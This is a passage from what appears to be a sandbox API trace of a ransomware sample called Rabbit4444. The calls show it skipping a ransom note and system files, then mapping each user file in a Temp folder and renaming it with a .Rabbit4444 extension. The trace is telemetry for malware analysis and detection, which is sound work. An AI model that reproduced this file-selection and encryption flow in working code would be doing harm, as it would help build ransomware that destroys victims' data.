(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\RnruXrOBs.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\rnruxrobs.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.666] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.666] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14697812268) returned 1 [0055.667] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=39464) returned 1 [0055.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0055.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0055.668] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9d30, lpName=0x0) returned 0x298 [0055.668] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d30) returned 0x70000 [0055.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0055.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0055.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0055.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0055.669] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14697993335) returned 1 [0055.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0055.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0055.669] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.670] CloseHandle (hObject=0x298) returned 1 [0055.670] CloseHandle (hObject=0x278) returned 1 [0055.670] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\RnruXrOBs.pdf.Rabbit4444") returned 59 [0055.670] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\RnruXrOBs.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\rnruxrobs.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\RnruXrOBs.pdf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\rnruxrobs.pdf.rabbit4444"), dwFlags=0x1) returned 1 [0055.671] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfba73e0, ftCreationTime.dwHighDateTime=0x1d4c6a8, ftLastAccessTime.dwLowDateTime=0xab6e7a00, ftLastAccessTime.dwHighDateTime=0x1d4d150, ftLastWriteTime.dwLowDateTime=0xab6e7a00, ftLastWriteTime.dwHighDateTime=0x1d4d150, nFileSizeHigh=0x0, nFileSizeLow=0xbe82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t2aoDOtGdN.mkv", cAlternateFileName="T2AODO~1.MKV")) returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="Rabbit4444.exe") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2=".") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="..") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="windows") returned -1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="bootmgr") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="pagefile.sys") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="boot") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="ids.txt") returned 1 [0055.671] lstrcmpiW (lpString1="t2aoDOtGdN.mkv", lpString2="NTUSER.DAT") returned 1 [0055.671] lstrcpyW (in: lpString1=0x130eb7e, lpString2="t2aoDOtGdN.mkv" | out: lpString1="t2aoDOtGdN.mkv") returned="t2aoDOtGdN.mkv" [0055.671] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\t2aoDOtGdN.mkv", dwFileAttributes=0x0) returned 1 [0055.671] lstrlenW (lpString="t2aoDOtGdN.mkv") returned 14 [0055.671] lstrlenW (lpString="Rabbit4444") returned 10 [0055.671] lstrcmpiW (lpString1="DOtGdN.mkv", lpString2="Rabbit4444") returned -1 [0055.671] lstrlenW (lpString=".dll") returned 4 [0055.671] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0055.671] lstrlenW (lpString=".lnk") returned 4 [0055.672] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0055.672] lstrlenW (lpString=".ini") returned 4 [0055.672] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0055.672] lstrlenW (lpString=".sys") returned 4 [0055.672] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0055.672] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\t2aoDOtGdN.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\t2aodotgdn.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.672] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.672] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14698258881) returned 1 [0055.672] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=48770) returned 1 [0055.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0055.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0055.672] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc190, lpName=0x0) returned 0x298 [0055.672] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc190) returned 0x70000 [0055.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0055.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0055.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0055.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0055.674] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14698492487) returned 1 [0055.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0055.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0055.674] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.675] CloseHandle (hObject=0x298) returned 1 [0055.675] CloseHandle (hObject=0x278) returned 1 [0055.675] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\t2aoDOtGdN.mkv.Rabbit4444") returned 60 [0055.675] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\t2aoDOtGdN.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\t2aodotgdn.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\t2aoDOtGdN.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\t2aodotgdn.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0055.676] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4949190, ftCreationTime.dwHighDateTime=0x1d4d0ef, ftLastAccessTime.dwLowDateTime=0xf0b6e630, ftLastAccessTime.dwHighDateTime=0x1d4ce79, ftLastWriteTime.dwLowDateTime=0xf0b6e630, ftLastWriteTime.dwHighDateTime=0x1d4ce79, nFileSizeHigh=0x0, nFileSizeLow=0x1642e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ubUCYWoEFDw-iWXBm6j.bmp", cAlternateFileName="UBUCYW~1.BMP")) returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="Rabbit4444.exe") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2=".") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="..") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="windows") returned -1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="bootmgr") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="pagefile.sys") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="boot") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="ids.txt") returned 1 [0055.676] lstrcmpiW (lpString1="ubUCYWoEFDw-iWXBm6j.bmp", lpString2="NTUSER.DAT") returned 1 [0055.676] lstrcpyW (in: lpString1=0x130eb7e, lpString2="ubUCYWoEFDw-iWXBm6j.bmp" | out: lpString1="ubUCYWoEFDw-iWXBm6j.bmp") returned="ubUCYWoEFDw-iWXBm6j.bmp" [0055.676] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ubUCYWoEFDw-iWXBm6j.bmp", dwFileAttributes=0x0) returned 1 [0055.676] lstrlenW (lpString="ubUCYWoEFDw-iWXBm6j.bmp") returned 23 [0055.676] lstrlenW (lpString="Rabbit4444") returned 10 [0055.676] lstrcmpiW (lpString1="WXBm6j.bmp", lpString2="Rabbit4444") returned 1 [0055.677] lstrlenW (lpString=".dll") returned 4 [0055.677] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0055.677] lstrlenW (lpString=".lnk") returned 4 [0055.677] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0055.677] lstrlenW (lpString=".ini") returned 4 [0055.677] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0055.677] lstrlenW (lpString=".sys") returned 4 [0055.677] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0055.677] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ubUCYWoEFDw-iWXBm6j.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ubucywoefdw-iwxbm6j.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.677] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.677] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14698768146) returned 1 [0055.677] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=91182) returned 1 [0055.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0055.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0055.677] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16730, lpName=0x0) returned 0x298 [0055.677] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16730) returned 0x70000 [0055.680] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.680] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0055.680] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.680] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0055.680] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.680] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0055.680] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.680] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0055.680] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14699102942) returned 1 [0055.680] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0055.680] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0055.680] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.681] CloseHandle (hObject=0x298) returned 1 [0055.681] CloseHandle (hObject=0x278) returned 1 [0055.682] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ubUCYWoEFDw-iWXBm6j.bmp.Rabbit4444") returned 69 [0055.682] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ubUCYWoEFDw-iWXBm6j.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ubucywoefdw-iwxbm6j.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\ubUCYWoEFDw-iWXBm6j.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ubucywoefdw-iwxbm6j.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0055.682] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c78e1b0, ftCreationTime.dwHighDateTime=0x1d4d324, ftLastAccessTime.dwLowDateTime=0xff6dc520, ftLastAccessTime.dwHighDateTime=0x1d4d1a5, ftLastWriteTime.dwLowDateTime=0xff6dc520, ftLastWriteTime.dwHighDateTime=0x1d4d1a5, nFileSizeHigh=0x0, nFileSizeLow=0x141a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vY48FtNhH7zPDhB.mp3", cAlternateFileName="VY48FT~1.MP3")) returned 1 [0055.682] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.682] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.682] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="Rabbit4444.exe") returned 1 [0055.683] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2=".") returned 1 [0055.683] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="..") returned 1 [0055.683] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="windows") returned -1 [0055.683] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="bootmgr") returned 1 [0055.683] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="pagefile.sys") returned 1 [0055.683] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="boot") returned 1 [0055.683] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="ids.txt") returned 1 [0055.683] lstrcmpiW (lpString1="vY48FtNhH7zPDhB.mp3", lpString2="NTUSER.DAT") returned 1 [0055.683] lstrcpyW (in: lpString1=0x130eb7e, lpString2="vY48FtNhH7zPDhB.mp3" | out: lpString1="vY48FtNhH7zPDhB.mp3") returned="vY48FtNhH7zPDhB.mp3" [0055.683] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\vY48FtNhH7zPDhB.mp3", dwFileAttributes=0x0) returned 1 [0055.683] lstrlenW (lpString="vY48FtNhH7zPDhB.mp3") returned 19 [0055.683] lstrlenW (lpString="Rabbit4444") returned 10 [0055.683] lstrcmpiW (lpString1="7zPDhB.mp3", lpString2="Rabbit4444") returned -1 [0055.683] lstrlenW (lpString=".dll") returned 4 [0055.683] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0055.683] lstrlenW (lpString=".lnk") returned 4 [0055.683] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0055.683] lstrlenW (lpString=".ini") returned 4 [0055.683] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0055.683] lstrlenW (lpString=".sys") returned 4 [0055.683] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0055.683] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\vY48FtNhH7zPDhB.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\vy48ftnhh7zpdhb.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.683] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.683] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14699419153) returned 1 [0055.683] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=82336) returned 1 [0055.684] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0055.684] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0055.684] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x144a0, lpName=0x0) returned 0x298 [0055.684] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x144a0) returned 0x70000 [0055.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0055.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0055.686] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0055.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0055.686] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14699681553) returned 1 [0055.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0055.686] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0055.686] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.687] CloseHandle (hObject=0x298) returned 1 [0055.687] CloseHandle (hObject=0x278) returned 1 [0055.688] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\vY48FtNhH7zPDhB.mp3.Rabbit4444") returned 65 [0055.688] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\vY48FtNhH7zPDhB.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\vy48ftnhh7zpdhb.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\vY48FtNhH7zPDhB.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\vy48ftnhh7zpdhb.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0055.688] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5b89150, ftCreationTime.dwHighDateTime=0x1d4cdb7, ftLastAccessTime.dwLowDateTime=0x7650a290, ftLastAccessTime.dwHighDateTime=0x1d4c6a0, ftLastWriteTime.dwLowDateTime=0x7650a290, ftLastWriteTime.dwHighDateTime=0x1d4c6a0, nFileSizeHigh=0x0, nFileSizeLow=0x4781, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X2hoDzalyI1 oZ3p1skU.odt", cAlternateFileName="X2HODZ~1.ODT")) returned 1 [0055.688] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.688] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.688] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="Rabbit4444.exe") returned 1 [0055.689] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2=".") returned 1 [0055.689] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="..") returned 1 [0055.689] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="windows") returned 1 [0055.689] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="bootmgr") returned 1 [0055.689] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="pagefile.sys") returned 1 [0055.689] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="boot") returned 1 [0055.689] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="ids.txt") returned 1 [0055.689] lstrcmpiW (lpString1="X2hoDzalyI1 oZ3p1skU.odt", lpString2="NTUSER.DAT") returned 1 [0055.689] lstrcpyW (in: lpString1=0x130eb7e, lpString2="X2hoDzalyI1 oZ3p1skU.odt" | out: lpString1="X2hoDzalyI1 oZ3p1skU.odt") returned="X2hoDzalyI1 oZ3p1skU.odt" [0055.689] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\X2hoDzalyI1 oZ3p1skU.odt", dwFileAttributes=0x0) returned 1 [0055.689] lstrlenW (lpString="X2hoDzalyI1 oZ3p1skU.odt") returned 24 [0055.689] lstrlenW (lpString="Rabbit4444") returned 10 [0055.689] lstrcmpiW (lpString1="3p1skU.odt", lpString2="Rabbit4444") returned -1 [0055.689] lstrlenW (lpString=".dll") returned 4 [0055.689] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0055.689] lstrlenW (lpString=".lnk") returned 4 [0055.689] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0055.689] lstrlenW (lpString=".ini") returned 4 [0055.689] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0055.689] lstrlenW (lpString=".sys") returned 4 [0055.689] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0055.689] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\X2hoDzalyI1 oZ3p1skU.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\x2hodzalyi1 oz3p1sku.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.689] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.689] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14700019831) returned 1 [0055.689] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=18305) returned 1 [0055.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0055.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0055.690] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a90, lpName=0x0) returned 0x298 [0055.690] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a90) returned 0x70000 [0055.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0055.690] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0055.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0055.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0055.691] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14700162414) returned 1 [0055.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0055.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 